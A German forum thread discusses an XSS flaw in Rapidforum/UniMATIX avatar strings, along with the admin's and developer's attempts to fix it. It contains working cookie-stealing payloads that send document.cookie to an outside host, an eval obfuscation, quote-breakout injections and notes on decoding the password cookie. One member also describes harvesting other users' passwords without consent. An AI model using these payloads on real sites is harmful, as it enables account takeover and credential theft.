fb18.de
/ Off-Topic
/ Allgemeines
Klitzekleines Sicherheitsloch in UniMATIX
Im Zuge eines kleinen Feldversuchs über die Sicherheitsvorkehrungen bei Rapidforum bin ich auf einen kleinen Bug gestoßen. Da die gefundene Sicheitslücke von Björn als harmlos eingestuft worden ist (Microsoft läßt grüßen), sah ich mich leider herausgefordert, dem ein wenig nachzugehen. Dabei ist mir leider nicht nur Björns Passwort in die Hände gefallen. Folgende Personen sollten daher so bald wie möglich ihr Passwort ändern, solang sie mir nicht uneingeschränkt vertrauen [img]
http://www.fb18.de/gfx/22.gif[/img]:
82 Fred
322 Bobo
166 Lümmel
305 Da:Sourcerer
392 leif
363 peetPan
4 Zaphod
247 )-*|rudel_IC|*-(
165 tekai
42 Slater
74 Christoph
232 Viciarg
161 Dennis
55 Faleiro
239 xeen9
395 Sierra
114 Thor
342 takahara
438 Tweety
83 hannosch
175 MoKrates
140 M
104 Cyrax
343 GrosserSchöpfer
76 Anatoly Karpov
75 El-B
73 schnuckitraum
282 fred fredsen
225 meiki
413 Alter Sack
304 Farcon
143 Psycho
86 r-hold
284 asdf
354 FireTiger
349 skillz
409 cbraham
25 Bert
45 galen
328 Tranquilly
224 Frischling
359 hs
440 ronny
11 PaRaDoX
179 RaggaDee
154 mind_pattern
422 Flu
67 Labskaus
Ich hab Björn erklärt wo das Problem liegt, und dass nicht er und sein Forum schuld sind, sondern Rapidforum bei der Übergabe von Parametern geschlampt hat. D.h. das möglicherweise mehrere Foren bei Rapidforum.com davon betroffen sind.
Die genaue Vorgehensweise werde ich beschreiben, wenn Rapidforum die Sicherheitsmängel behoben hat.
Aua, ganz schöne Liste. Hab ich ja nochmal glück gehabt [img]
http://www.fb18.de/gfx/15.gif[/img]
/me erwartet gespannt die Erklärung
Eins täte mich nur interessieren…haben die Leute mit schwachen Passwörtern Pech gehabt oder hat das mit der Passwortstärke nichts zu tun?
Forumbug… die haben einfach nur Pech gehabt. Mal unter uns… viele waren wesentlich fantasievoller bei der Passwortvergabe als Björn [img]
http://www.fb18.de/gfx/15.gif[/img]
Forumbug… die haben einfach nur Pech gehabt. Mal unter uns… viele waren wesentlich fantasievoller bei der Passwortvergabe als Björn [img]http://www.fb18.de/gfx/15.gif[/img]
Umso ärgerlicher, können die Beteiligten nicht mal was dafür…hatte mich nur gefragt wie es gerade zu dieser Personenauswahl kam, aber anscheinend wirklich einfach Pech [img]
http://www.fb18.de/gfx/20.gif[/img]
Im Zuge eines kleinen Feldversuchs über die Sicherheitsvorkehrungen bei Rapidforum bin ich auf einen kleinen Bug gestoßen. Da die gefundene Sicheitslücke von Björn als harmlos eingestuft worden ist (Microsoft läßt grüßen), sah ich mich leider herausgefordert, dem ein wenig nachzugehen. Dabei ist mir leider nicht nur Björns Passwort in die Hände gefallen. Folgende Personen sollten daher so bald wie möglich ihr Passwort ändern, solang sie mir nicht uneingeschränkt vertrauen
Nutzt es denn was, das Passwort zu ändern, wenn man dir nicht vertraut?
Schliesslich vertrau ich dir jetzt nicht wesentlich mehr als zu dem Zeitpunkt bevor du die Passwörter herausgefunden hast.
Trotzdem konntest du sie herausfinden.
Das einzige was das Ändern des Passwortes nach sich zieht ist doch etwas (je nach Beschaffenheit der Sicherheitslücke…) mehr Aufwand um das neue Passwort herauszufinden, oder?
Tzwoenn mit Dir macht man schon was mit. Hättest Du gleich gesagt, dass das Problem nicht nur Dein "wir tauschen alle Avatare durch"-Script nicht laufen lässt, sondern damit Passwörter ausgelesen werden können, dann hätte ich das nicht als harmlos eingestuft. %)
Da ja jetzt einige ihre Passwörter ändern werden:
[img]
http://www.fb18.de/gfx/1.gif[/img] Vorsichtig mit einigen Sonderzeichen im Passwort. Wenn man z.B. ein '&' im Paßwort hat, wird dies durch "&" ersetzt. Ich vermute mal, '<' und '>' entsprechend ebenfalls.
Ich wunderte mich, warum ich mich mit meinem neuen Paßwort nicht mehr rein kam und bin erst durch die "schick mir mein Paßwort zu"-Funktion drauf gekommen. [img]
http://www.fb18.de/gfx/16.gif[/img]
Also die Mail an Dragony bezüglich Passwort-Fressen ist raus und das Teil mit dem Passwort-Sonderzeichen habe ich ebenfalls gepostet. Leider kann man nur alle 12 Stunden sich das Passwort zuschicken lassen, ich teste dann mal, welche Zeichen es betrifft und schreibe zumindest ein Hinweis an entsprechendes Eingabefeld.
Thx für die Hinweise. (Außer Sven, der bekommt noch auf'n Sack dafür. [img]
http://www.fb18.de/gfx/25.gif[/img])
Tzwoenn mit Dir macht man schon was mit. Hättest Du gleich gesagt, dass das Problem nicht nur Dein "wir tauschen alle Avatare durch"-Script nicht laufen lässt, sondern damit Passwörter ausgelesen werden können, dann hätte ich das nicht als harmlos eingestuft. %)
Darauf bin ich auch erst später gekommen. Sorry.
Das einzige was das Ändern des Passwortes nach sich zieht ist doch etwas (je nach Beschaffenheit der Sicherheitslücke…) mehr Aufwand um das neue Passwort herauszufinden, oder?
Du kannst nur auf mein Wort vertrauen, dass ich ab gestern alle Bemühunhen in die Richtung aufgegeben hab.
Tzwoenn, Meister Dragony hat's im Examensstreß heute neu gemacht. Er hat die Passwörter jetzt noch verschlüsselt. Immerhin. Wie lange braucht man mit 'nem Haustypischen PC, um per Brute-Force 'n Passwort (MD5) zu knacken (das etwas länger und Abwechslungsreicher als 'aaa') ist? Tippe ich mit +1 Tag ungefähr korrekt?
Das einzige was das Ändern des Passwortes nach sich zieht ist doch etwas (je nach Beschaffenheit der Sicherheitslücke…) mehr Aufwand um das neue Passwort herauszufinden, oder?
Du kannst nur auf mein Wort vertrauen, dass ich ab gestern alle Bemühunhen in die Richtung aufgegeben hab.
wieso gibst du nicht einfach dein wort drauf,
die textdatei den bisher geknachten passwörter zu löschen,
oder hast du alle auswenig gelernt? ;)
Hier die Mail, die an meinen kleinen Lieblinsforumadmin ging:
ganz einfach
ich hab als mein avatarbild folgenden string benutzt:
http://localhost/a.gif" onError="this.src='http://www.kamalook.de/sven/avatare/?'+document.cookie
nach einfügen in das forumstemplate wird daraus folgendes
<img src="http://localhost/a.gif" onError="this.src='http://www.kamalook.de/sven/avatare/?'+document.cookie">
da wohl kaum jemand nen webserver mit gültigem http://localhost/a.gif laufen hat, wird die javascript-fehlerbehandlung aufgerufen. diese setzt den src des bildes auf http://www.kamalook.de/sven/avatare/, übergibt aber gleichzeitig alle cookies dieser seite an das php script auf kamalook.de. interessant ist dabei nur das user cookie, welches z.B. folgenden string enthält: 1%2C222654588%2C_%21%21%21ENC61A61A61A
wie leicht zu erkennen ist, handelt es sich hier im den user nr. 1. wichtig ist hier noch das ende des string, welches mit "ENC" beginnt. wie wir zuerst dachten, befindet sich dort ein hash oder zumindest das gut verschlüsselte passwort befindet, mit dem der server den user authentifiziert. allerdings… ein blick in den hexeditor ließ einem die haare zu berge stehen. der "verschlüsselungsalgothmus" ist dann doch den sicherheitsfanatikern von rapidforum eine spur zu simpel geraten. als beispiel exerzieren wir den mal an deinem "highsecurity-passwort" durch:
ENC - marker für beginn des passwortes
61 - hex für "a"
A - füllzeichen (zur verwirrung)
61 - hex für "a"
A - füllzeichen (zur verwirrung)
61 - hex für "a"
A - füllzeichen (zur verwirrung)
ergo: passwort="aaa"
wäre nett, wenn du rapidforum mal diese mail zukommen lassen würdest, damit sie zum einen bei der übergabe der userstrings "gefährliche" zeichen filtern und sich zum anderen mal ihre cookies durch den magen gehen lassen.
hochachtungsvoll
sven & malte
Tzwoenn, bitte mach aus der "Code"- wieder eine "Quote"-Umgebung. Derzeit werden die endlos langen Zeilen nämlich nicht umgebrochen.
ich hab als mein avatarbild folgenden string benutzt:
http://localhost/a.gif" onError="this.src='http://www.kamalook.de/sven/avatare/?'+document.cookie
nach einfügen in das forumstemplate wird daraus folgendes
<img src="http://localhost/a.gif" onError="this.src='http://www.kamalook.de/sven/avatare/?'+document.cookie">
Es wird nicht überprüft, daß in dem Avatastring nur eine Url steht (oder zumindest, daß der String kein Anführungszeichen enthält)? Autsch. [img]
http://www.fb18.de/gfx/11.gif[/img]
Das ist kein Avatarstring. Es werden neun Strings zur Verfügung gestellt, die auf Länge und HTML Fähigkeit konfiguriert werden können. Letzteres geschieht so, dass z. B. umgewandelt werden. Einen tatsächlichen Avatarstring gibt es nicht.
saubere Arbeit. Respekt!
So etwas nennt man auch Hacking!
/me thinx you proved yourself worthy not to be called a skriptkiddie :)
Ich frage mich grade, ob das mit dem Cookie senden immer geht, oder ob ihr das Pass von Tri nicht habt, weil der es vernuenftig eingestellt hat, dass cookies nur mit der Originalwebseite ausgetauscht werden…
MoKrates
Ich frage mich grade, ob das mit dem Cookie senden immer geht, oder ob ihr das Pass von Tri nicht habt, weil der es vernuenftig eingestellt hat, dass cookies nur mit der Originalwebseite ausgetauscht werden…
Das habe ich auch so eingestellt, aber der Cookie wird ja auch gar nicht Serverseitig ausgelesen: Das wird auf dem Client mit Javascript durch das document.cookie gemacht und dann in der URL an den anderen Server geschickt.
Das ist kein Avatarstring. Es werden neun Strings zur Verfügung gestellt, die auf Länge und HTML Fähigkeit konfiguriert werden können. Letzteres geschieht so, dass z. B. < und > umgewandelt werden. Einen tatsächlichen Avatarstring gibt es nicht.
Hä? Ich meine den String, den man bei den Optionen in das Feld "Avatar" einträgt. Und der sollte scheinbar besser überprüft werden.
Hä? Ich meine den String, den man bei den Optionen in das Feld "Avatar" einträgt. Und der sollte scheinbar besser überprüft werden.
Das ist wie gesagt kein fester Avatarstring. Ein andere Administrator möchte da vielleicht bunte Banner für eine Signatur speichern.
Hä? Ich meine den String, den man bei den Optionen in das Feld "Avatar" einträgt. Und der sollte scheinbar besser überprüft werden.
Das ist wie gesagt kein fester Avatarstring. Ein andere Administrator möchte da vielleicht bunte Banner für eine Signatur speichern.
D.h. die Verwendung des Strings (hier: als Avatar-URL) ist nicht vorgegeben, sondern von Dir so konfiguriert? Dann ist es eben unsicher, einen solch allgemeinen String als Avatar-URL zu verwenden, auch abgesehen von dem aktuellen Problem.
Es gibt schließlich immer mal wieder Bugs in Browsern, daß man diese mit ein wenig Javascript zum Absturz oder zur Herausgabe von nicht öffentlichen Daten überreden kann. Und wenn man nun einfach Javascript über den Avatar auf jede UniMATIX-Seite setzen kann, dann ist jede Seite von UniMATIX potentiell gefährlich.
Ich nehme an, daß diese "HTML Fähigkeit" dann angestellt ist (d.h. < und >
nicht ersetzt werden)? Dann wäre es zumindest ein zweiter Schritt für die Sicherheit, dies für das Feld auszustellen.
Ich wäre eigentlich immer sehr vorsichtig, wenn fremde Leute allgemein HTML auf meine Seiten setzen können.
ganz einfach
ich hab als mein avatarbild folgenden string benutzt:
http://localhost/a.gif"
…ja, und ich wunder mich, daß beim Zugriff auf einige (also nicht alle) Threads ein "GET a.gif"-Zugriff auf localhost gemeldet wird…*grummel*
Dat ist auch nicht aktiviert leif. In Sven's Zeile ist ja auch kein enthalten. Wollen wir's ganz sicher machen? Keine darf mehr posten, Ihr schickt mir Briefe und ich scanne die dann ein. [img]
http://www.fb18.de/gfx/22.gif[/img]
Dat ist auch nicht aktiviert leif. In Sven's Zeile ist ja auch kein < oder > enthalten.
[img]
http://www.fb18.de/gfx/8.gif[/img] Falsch gedenkt. Natürlich.
Ich nehme an, daß diese "HTML Fähigkeit" dann angestellt ist (d.h. < und > nicht ersetzt werden)? Dann wäre es zumindest ein zweiter Schritt für die Sicherheit, dies für das Feld auszustellen.
< und > werden durchaus ersetzt, diese Zeichen kommen in dem fraglichen String aber auch gar nicht vor. Der Fehler liegt vielmehr darin, dass Anführungszeichen zugelassen werden und es somit möglich ist das src-Feld des img-Tags vorzeitig zu schließen um dann die onError-Routine einzuschleusen.
Wollen wir's ganz sicher machen? Keine darf mehr posten, Ihr schickt mir Briefe und ich scanne die dann ein. [img]http://www.fb18.de/gfx/22.gif[/img]
Um diese Lücke zu schließen genügt doch lediglich die Anführungszeichen zu filtern. Denn derzeit kann immer noch jeder Depp JavaScript einschleusen um seinen Schabernack zu treiben. Außerdem kann man immer noch die Cookies auslesen!!! Das sollte schleunigst abgestellt werden!
Ich will hier ja niemanden auf dumme Ideen bringen, aber es genügt durchaus nur der Cookie um sich in einen Account einzuloggen. Eine Kenntnis des Passwortes ist dazu nicht notwendig.
Na ja. Wie gesagt. Da würden wieder andere Admins Krawall machen, die " wollen, aber kein HTML.
Wie auch immer. Der String ist jetzt hier im Forum einfach auf 64 Bytes beschränkt, das dürfte relativ eng werden. Ansonsten habe ich ohnehin immer noch vor, eine Avatar-Uploadfunktion zu implementieren und den String mit einer festen URL beginnen zu lassen. Wenn da dann noch jemand herumkommt…
Da würden wieder andere Admins Krawall machen, die " wollen, aber kein HTML.
Was glaubt du was die für einen Krawall machen, wenn jemand in ihre Accounts einsteigt. Denn das Problem ist ja wohl nicht nur auf dieses Forum beschränkt, sondern prinzipiell bei jedem RapidForum einsetzbar, welches Avatare auf diese Weise benutzt.
Der String ist jetzt hier im Forum einfach auf 64 Bytes beschränkt, das dürfte relativ eng werden.
Ist knapp aber es reicht:
x onError="this.src='[url=http://myurl.de/?]http://myurl.de/?[/url]'+document.cookie
56 Zeichen.
Andere Scherze wie Weiterleitungen sind natürlich schon für weniger zu haben.
Ein Quick-And-Dirty Fix wäre folgendermaßen möglich:
<edit>
Sorry, war Quatsch.
</edit>
Korriegiert mich, wenn ich mich irre, aber der Cookie allein reicht bei Rapid doch nicht. Das Thema hatten wir doch ein paar Mal, wo sich einige gegen das Argument seitens Rapid sträubten, dass aus Sicherheitsgründen bei dem Besuch von einem anderen PC aus, das Passwort neu eingegeben werden muss.
Die Idee mit dem Java-Script finde ich an sicht fein, aber so ganz das Wahre ist es auch noch nicht. *grübel*
Korriegiert mich, wenn ich mich irre, aber der Cookie allein reicht bei Rapid doch nicht. Das Thema hatten wir doch ein paar Mal, wo sich einige gegen das Argument seitens Rapid sträubten, dass aus Sicherheitsgründen bei dem Besuch von einem anderen PC aus, das Passwort neu eingegeben werden muss.
Korrigier!
Der Cookie reicht vollkommen aus. Jedes mal, wenn man sich mit seinem Passwort anmeldet bekommt man einen neuen Cookie, der an eine Zufallszahl geknüpft ist und wird forthin nur mittels des Cookies identifiziert. Der von dir beschriebene Effekt tritt nur dann auf, wenn man sich mit einem anderen Browser anmeldet und dann an seinen ursprünglichen Browser zurückkehrt. Dann merkt der blitzgescheite Server nämlich, dass die gespeicherte Zufallszahl nicht mit der des Cookies übereinstimmt und gibt die Fehlermeldung aus.
Was das mit Sicherheit zu tun haben soll entzieht sich allerdings meiner Kenntniss, vor allem wenn man bedenkt, dass das Passwort bis vor kurzem ohnehin im Quasi-Klartext im Cookie stand.
Lange rede kurzer Sinn:
Die Anmeldung nur mit Cookie ist möglich und lustigerweise sogar viel unauffälliger als ohne, da der Server dann aufgrund der Zufallszahl davon ausgeht, dass man sich vom zuletzt benutzten Brower anmeldet. Wenn man sich hingegen als böser Hacker mit dem "erhackten" Passwort anmeldet, bekommt der rechtmäßige Accountbesitzer bei der nächsten Anmeldung die erwähnte Fehlermeldung vorgesetzt.
Die ist ja wohl auch nicht bei dir erschienen, als unbekannte Rabauken nächtens "stellvertretend" dein Abdankungsbesuch eingereicht haben ;).
Die Idee mit dem Java-Script finde ich an sicht fein, aber so ganz das Wahre ist es auch noch nicht. *grübel*
Geht übrigens nicht :)
Zumindest nicht so, wie von mir beschrieben. Vielleicht fällt ja jemanden noch was ein, aber solange man den String nicht serverseitig säubert sehe ich da schwarz.
Man könnte immer dies:
document.write(fix_string("%UNSERSTRING%");In dies verwandeln:
document.write(fix_string("leck mich doch");do_evil_things();// ");
Deine Beschränkung auf 64 Zeichen zieht nicht, Björn. Die Datenbank verwendet Blob oder Text, d.h. ich kann ganze Romane übergeben. Und du glaubst doch nicht, dass sich jemand von einem maxlength="xxx" aufhalten läßt?
MozillaUser haben übrigens die Möglichkeit unter Scipts&Plugins abzustellen, dass Javascript auf Cookie-Informationen zugreifen kann.
Hmm. Tjoah. Ich kann da eigentlich auch nicht so viel machen. Ich werde Dragony noch mal bescheid sagen. Dann könnt Ihr das mit ihm ausdiskutieren.
Die bei Rapid sollten einfach eine vernuenftige Session-ID generieren, die Serverseitig mit der Client-IP verknuepft wird (alles andere ist toetlich IMHO)
Das alleine von einem Cookie abhaengig zu machen, der das Pass im Klartext enthaelt ist schlichtweg merkbefreit…
MoKrates
Edit: Lad Dragony doch einfach mal hier auf diesen Thread ein.
Also ich habe Dragony jetzt noch ne Mail geschickt, mit Link zu diesem Topic. Von meiner Seite aus kann ich nur noch folgendes anbieten: Avatare ganz raus, bis ich mal irgendwann Zeit gefunden habe, mein Upload-Skript zuende zubauen (Mist… Das ist ja auch mit draufgegangen…). Bzw. würde das nur für Neuanmeldungen gelten. Die aktuellen Avatare könnte ich ja so einfrieren, nur Ihr könnt halt nix mehr dran ändern.
BTW: Was ích hier so aus den Postings rauslese, verleitet mich zu der Annahme, dass einige glauben, RapidForum sei von 'nem ganzen Entwicklerteam gecoded worden. Allerdings ist das (zumindest was den Source anbelangt), ein Ein-Mann-Unternehmen, lediglich gestüzt von meinen TOP(!)-Supportler-Lieblingen [img]
http://www.fb18.de/gfx/22.gif[/img] und zumindest einem Skin-Designer. Das nur so nebenbei.
So jetzt aber. Ersetze in deinem Template:
<img SRC="%USERSTRING%">Durch:
<noscript><img SRC="%USERSTRING%"></noscript>Durch das NOSCRIPT-Tag wird im eingeschlossenen Bereich das Ausführen jeglicher Skripte unterbunden und da < und > gefiltert werden ist das vorzeitige schließen des NOSCRIPT-Blocks auch nicht möglich.
Einfach, wie brilliant. Wird sofort umgesetzt.
Gna. Totaler Blödsinn wie mir einfällt. Das wird doch nur ausgeführt, wenn kein JavaScript aktiviert ist!
Edit: Wäre ja auch zu einfach gewesen. [img]
http://www.fb18.de/gfx/28.gif[/img]
Gute Idee trotzdem, habe gleich was.
Hmm. Okay. ' und " werden jetzt nicht mehr genommen, wenn Javascript beim Besucher aktiviert sind. Eigentlich soll dann ein Noavatar Pic erscheinen. Das will aber gerade nicht. So. Noch irgendwelche Zeichen oder sind jetzt alle glücklich? :)
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
var url = "(((creator_string9)))";
var letters = url.length;
var notlegal = 0;
for(i=0; i < letters-1; i++) {
if(url.charAt(i) == "\'" || url.charAt(i) == '\"') notlegal = 1;
}
if(notlegal == 0) {
document.write('<IMG SRC="(((creator_string9)))">');
} else {
document.write('<IMG SRC="http://www.fb18.de/gfx/noavatar.gif">');
}
//-->
</SCRIPT>
<NOSCRIPT><IMG SRC="(((creator_string9)))"></NOSCRIPT>
Ich würde den EventHandler auf null setzen.
Sprich <img onError="null" …>
Oder wenn das nicht geht mit window.onError = …
Das geht immer noch nicht. Siehe mein "Avatar":
";document.write("JavaScript geht noch!");Wie ich schon oben erwähnt habe ist eine Lösung mittels JavaScript eher unwahrscheinlich, solange Anführungszeichen zugelassen werden, da man den String immer vorzeitig schließen und dann seinen eigenen Code anfügen kann.
Die frage ist dann aber welchen onError der Browser interpretiert, den ersten oder den zweiten. Und was ist mit onMouseOver oder solchen scherzen, nicht ganz so schnell aber ähnlich fatal [img]
http://www.fb18.de/gfx/28.gif[/img]
Moment, ich glaube den bekomme ich auch noch.
Edit: Dann halt doch nicht… *hmpf*
Moment, ich glaube den bekomme ich auch noch.
Edit: Dann halt doch nicht… *hmpf*
[img]
http://www.fb18.de/gfx/15.gif[/img]
Oh, Avatare putte [img]
http://www.fb18.de/gfx/16.gif[/img] Nichtmal die bestehenden einfrieren?
Hallo Leute.
Ja, Rapid ist ein Ein-Mann Projekt. Jedenfalls, was die Engine betrifft. Was ich mir bei dieser blöden Verschlüsselung gedacht habe, weiss ich auch nicht. Jedenfalls ist die schon uralt und wurde seit Ewigkeiten nicht mehr angefasst. Die Möglichkeit, überhaupt JavaScript von einem User her einzubetten kam wohl erst später. Nichtsdestotrotz ich habe die Routine umgehend geändert. Jetzt wird ein MD5-Hash gespeichert, der wohl nur noch sehr schwer zu hacken sein wird. Man kann allerdings auch weiterhin den Cookie auslesen und dann einfach den ganzen String in seinen eigenen Cookie packen. Ein Login mit einem _!!!EN String geht jedenfalls nicht, wenn er direkt eingegeben wird. Jedoch frage ich mich, wie ein User an PAsswörter kommen soll? Das kann doch nur der Admin des Forums, da ein User den JAvaScript nicht einschleusen kann (es sei denn, der Admin erlaubt HTML, was sowieso unklug wäre)
Jetzt wird ein MD5-Hash gespeichert, der wohl nur noch sehr schwer zu hacken sein wird.
MD5 klingt schonmal gut.
Jedoch frage ich mich, wie ein User an PAsswörter kommen soll? Das kann doch nur der Admin des Forums, da ein User den JAvaScript nicht einschleusen kann (es sei denn, der Admin erlaubt HTML, was sowieso unklug wäre)
Wie unten demonstriert reicht es ja nicht aus, HTML zu verbieten - es reicht schon aus, wenn der User Anfuehrungszeichen eingeben kann, um eben doch JavaScript einzuschleusen.
Die frage ist dann aber welchen onError der Browser interpretiert, den ersten oder den zweiten. Und was ist mit onMouseOver oder solchen scherzen, nicht ganz so schnell aber ähnlich fatal [img]http://www.fb18.de/gfx/28.gif[/img]
Ich bin zu faul zum nachschaun, aber der Meinung das bei Browsern die sich an das W3C-DOM halten, die der Reihenfolge nach abgearbeitet werden.
Zumindest geht das beim ie6.x und mozilla1.4 unter winXP. Die fehlenden Handler kann man ähnlich behandeln.
[img]
http://www.fb18.de/gfx/12.gif[/img] Schön ist das nicht, eher was für zwischendurch…
Jedoch frage ich mich, wie ein User an PAsswörter kommen soll? Das kann doch nur der Admin des Forums, da ein User den JAvaScript nicht einschleusen kann (es sei denn, der Admin erlaubt HTML, was sowieso unklug wäre)
Kann er eben doch. Zumindest wenn einer der Strings einen Link auf den Avatar des Benutzers darstellt, der dann in ein IMG-Tag eingefügt wird. Um das zu Bewerkstelligen sind keine HTML-Tags notwendig man muss lediglich Anführungszeichen benutzen dürfen. Die genaue Erklärung findet sich am Anfang dieses Threads. Daher wäre es sinnvoll dem Admin die Möglichkeit zu geben vom Server auch Anführungszeichen aus den Userstrings entfernen zu lassen oder aber diese Funktionalität in den HTML-Filter zu integrieren.
Das Auslesen der Passwörter funktioniert jetzt mit dem MD5 natürlich nicht mehr, auch wenn das Übernehmen des Accounts natürlich in Kenntnis des Cookies immer noch möglich ist. Aber die Einzige Möglichkeit die ich da sehe wäre den Cookie öfters zu aktualisieren (mit der an ihn gebundenen Zahl), so dass ein erbeuteter Cookie möglicherweise bereits unbrauchbar ist, wenn der Hacker ihn benutzen will.
wie wärs, wenn ich einfach aus dem ergebnis jegliches ".cookie" einfach rausfilter?
wie wärs, wenn ich einfach aus dem ergebnis jegliches ".cookie" einfach rausfilter?
Wäre auch ne Möglichkeit. Sofern es sonst keien Möglichkeit gibt auf cookies zuzugreifen :) (/me kennt dafür zu wenig JavaScript - zum Glück [img]
http://www.fb18.de/gfx/28.gif[/img])
Vielleicht würde es dann aber wieder neue Ideen geben. Siehe zum Beispiel die Weiterleitung. Wenn nicht einfach die " und ' rausgefiltert werden können, weil die noch gebraucht werden, dann bei nicht aktivierten HTML vielleicht einfach Schlüsselkombinationen wie ); und ";
Man braucht ja nichtmal filtern… einfach " durch " ersetzen sollte ja schon reichen, genauso wie das ja jetzt scheinbar schon mit & geschieht. (Eventuell bei der Gelegenheit noch 'ne zusaetzliche Option fuer den Admin, dieses Verhalten auszuschalten? z.B. beim Passwort-Feld find ich sowas eher stoerend)
Gefällt. Hmm. " mit & #147; und ' mit & #145;, falls da jemand seine Attributwerte mit ' nutzt.
wie wärs, wenn ich einfach aus dem ergebnis jegliches ".cookie" einfach rausfilter?
Würde nichts bringen. Man kann in Javascript den Befehl irgendwie als String zusammenbauen und dann mit eval ausführen lassen.
So a la
eval("....+document.coo"+"kie")
Nur mal so als Frage:
Hat man nicht ein ähnliches Problem bei der Suchen-Funktion?
Da steht doch wahrscheinlichst eine Datenbank hinter und das was man eingibt kommt ja auch in die Datenbankabfrage hinein. Ich werd das bestimmt nicht bei diesem schönen Forum ausprobieren, aber hat nicht zufällig jemand lust so ein kostenloses Forum zum testen anzulegen [img]
http://www.fb18.de/gfx/22.gif[/img]…
Ok, die User-Daten zu bekommen wird da wohl recht umständlich… könnte man da nicht ein "DROP TABLE x" und über x eine Art BruteForce laufe lassen? Das könnte vielleicht dumm enden.
Nö, das wär wohl zu einfach. Das geht bestimmt nicht. Aber ich wollte auch mal was schreiben…
Gute Nacht
Bei MySQL Injections geht diese Rechnung nur auf, wenn ein Parameter ungequotet in den MySQL-Abfragestring übernommen wird ála
SELECT * FROM tbl WHERE text LIKE $suchanfrageZudem muss der eingefügte Parameter am Ende stehen, sonst klappt es mit der Injection nicht, da ansonsten ein ungültiger MySQL-Befehl generiert werden würde.
Glaub mir, ich hab das schon ausgiebig getestet, hab bisher keine Möglichkeit gefunden, über diese Methode an irgendwelche Daten auszulesen.
Die Emailadresse scheint auch ausreichend getestet zu werden.
Die Homepage könnte schon wieder eher anfällig werden, allerdings mit geringeren - deswegen aber nicht zu ignorierenden - Auswirkungen: Opfer müssen sich das Profil des Betreffenden anschauen und vermutlich noch mit der Maus über den Homepagelink kommen.
Edit: Hmmm, überraschend. Beim Link zu der Homepage werden nicht nur < und < durch < und > ersetzt, sondern auch " durch ". Das könnte man doch auch für den Avatar machen, oder?
Oder wurde das erst in der letzten Nacht eingeführt?
Edit^2: Nervig, daß man ein & in einem Posting immer durch & ersetzen muß.
Edit^3: Und ein & muß man dann natürlich mit &amp; machen. Arggl. [img]
http://www.fb18.de/gfx/8.gif[/img]
Edit^4: Und wenn man das vorherige nochmals editiert, werden aus den &s wieder &s. [img]
http://www.fb18.de/gfx/8.gif[/img][img]
http://www.fb18.de/gfx/8.gif[/img][img]
http://www.fb18.de/gfx/8.gif[/img]
Testen wir das doch mal. Schalte die Avatare eben ein.
Edit: Will Dich ja nicht enttäuschen, aber auch wenn sie unter Optionen beim Wiederaufruf nicht angezeigt werden, sind sie trotzdem noch gespeichert (bei der Web-Site).
Testen wir das doch mal. Schalte die Avatare eben ein.
Edit: Will Dich ja nicht enttäuschen, aber auch wenn sie unter Optionen beim Wiederaufruf nicht angezeigt werden, sind sie trotzdem noch gespeichert (bei der Web-Site).
Mit "bei der Web-Seite" meinst Du, was bei
http://3773.rapidforum.com/action=profile&id=392 neben "Web-Site:" angezeigt wird, oder?
Ich benutze jetzt mal folgenden Terminus:
Optionen: Wo man den Kram für sich einstellen, kann. Der Link "Optionen" führt dahin. (URL:
http://3773.rapidforum.com/profile).
Profil: Wo andere die Informationen über einen einsehen können. Der Link hinter den Usernamen führt dahin. (URL z.B.:
http://3773.rapidforum.com/action=profile&id=392).
Ich hatte bei Optionen für Web-Site: etwas wie
[url=http://test/]http://test/[/url] kleiner < größer > anf " usw eingegeben.
Wenn ich nun wieder auf
Optionen gehe, endet der angezeigte String wirklich nach dem 'anf'. Der Rest wird nicht mehr angezeigt, da das Anführungszeichen den entsprechenden Parameter im HTML-Element beendet hat. Ok, damit könnte ich meine eigene Optionsseite manipulieren. Das ist nicht schlimm. Ein Blick in den HTML-Sourcecode der Seite zeigt, daß < und > ersetzt wurden durch < und >, das Anführungszeichen aber noch immer ein Anführungszeichen war.
Beim
Profil allerdings, waren neben "Web-Site:" aber überraschenderweise nicht nur < und > ersetzt, sondern auch das Anführungszeichen war durch " ersetzt.
Mysteriös.
Ich frage mich auch, welche dieser Ersetzungen schon beim Speichern der Optionen gemacht werden und welche erst, wenn sie wieder (aus der Datenbank o.ä.) ausgelesen werden.
Ach ja: In diesem allgemeinen "Beschreibungen/Mitteilungen"-Feld scheint es genauso zu funktionieren.
Das ist ja lustig. Ruft man die String über profile_userstring auf, werden sie wie gewünscht gewandelt. bei creator_string hingegen nicht. Dann ist die komplette Funktionalität ja schon da und muss nur noch übertragen werden.
Aber irgendwie sieht Ronnys Avatar (mit MozillaFirebird betrachtet) noch immer sehr suspekt aus:
<img src="" ;document.write="" javascript="" geht="" noch="" )="">Mit dem IExplorer bekomme ich interessanterweise einen anderen Quelltext angezeigt:
<IMG SRC="";document.write("JavaScript geht noch!");//">Letzteres entspricht auch dem, was der Server mit einem einfach "wget …." zurückliefert. Also gibt es hier auch noch Probleme mit meinem Mozilla [img]
http://www.fb18.de/gfx/26.gif[/img]. Vermutlich durch das document.write hervorgerufen.
Björn: Sorry für die Kühe - ähhh. - Mühe.
OK ich habe das HTML-Encoden ein Level erhöht. Jetzt werden alle Sonderzeichen encodiert. Braucht zwar etwas mehr Platz und beschwört hoffentlich keine anderen Nebenwirkungen, aber es sollte jetzt gefixed sein. Allerdings erst nach erneutem Speichern im Userprofil. Könnt ihr das bitte mal testen?
Leider funktioniert es nicht, anscheinend wird der entsprechende Userstring überhaupt nicht gefiltert. Zumindest habe ich mit folgendem String eine Message-Box erzeugen können:
x" onError="alert('Test')Seltsamerweise wird aber stattdessen das Feld für die Email-Adresse gefiltert, so dass aus
account@server.de account%40server.de wird. Dieses hat außerdem zur Folge, dass man jedes mal, wenn man seine Optionen ändert, dieses korrigieren muss und zu allem Überfluss auch noch das Passwort resettet wird.
ups. so jetzt müsste es aber gehen. ich mache noch n paar andere dinge nebenbei, deshalb kann ich es leider nicht selber groß testen :(
Argh. Das war 'n wenig viel. Leerzeichen, Doppelpunkte, @ Zeichen. Ginge es nicht einfach, nur " ' und ; zu filtern? In Verbindung mit dem Gegebenen könnte man damit nichts schadhaftes mehr bauen.
Edit: Bjorn42, der nach dem Speichern seines Profils, erst mal per Administration alles hiel machen musste. %)
so kann aber nichts mehr passieren. aber ist natürlich blöd, wenn man dann beim editieren alles umschreiben muss…. ich habe es beim editieren wieder rückkonvertiert. bitte mal testen ok?
Ne, das war es noch nicht ganz. Die Leerzeichen zumindest werden als Zeichenfolge ausgegeben (siehe "Im Grundstudium" links).
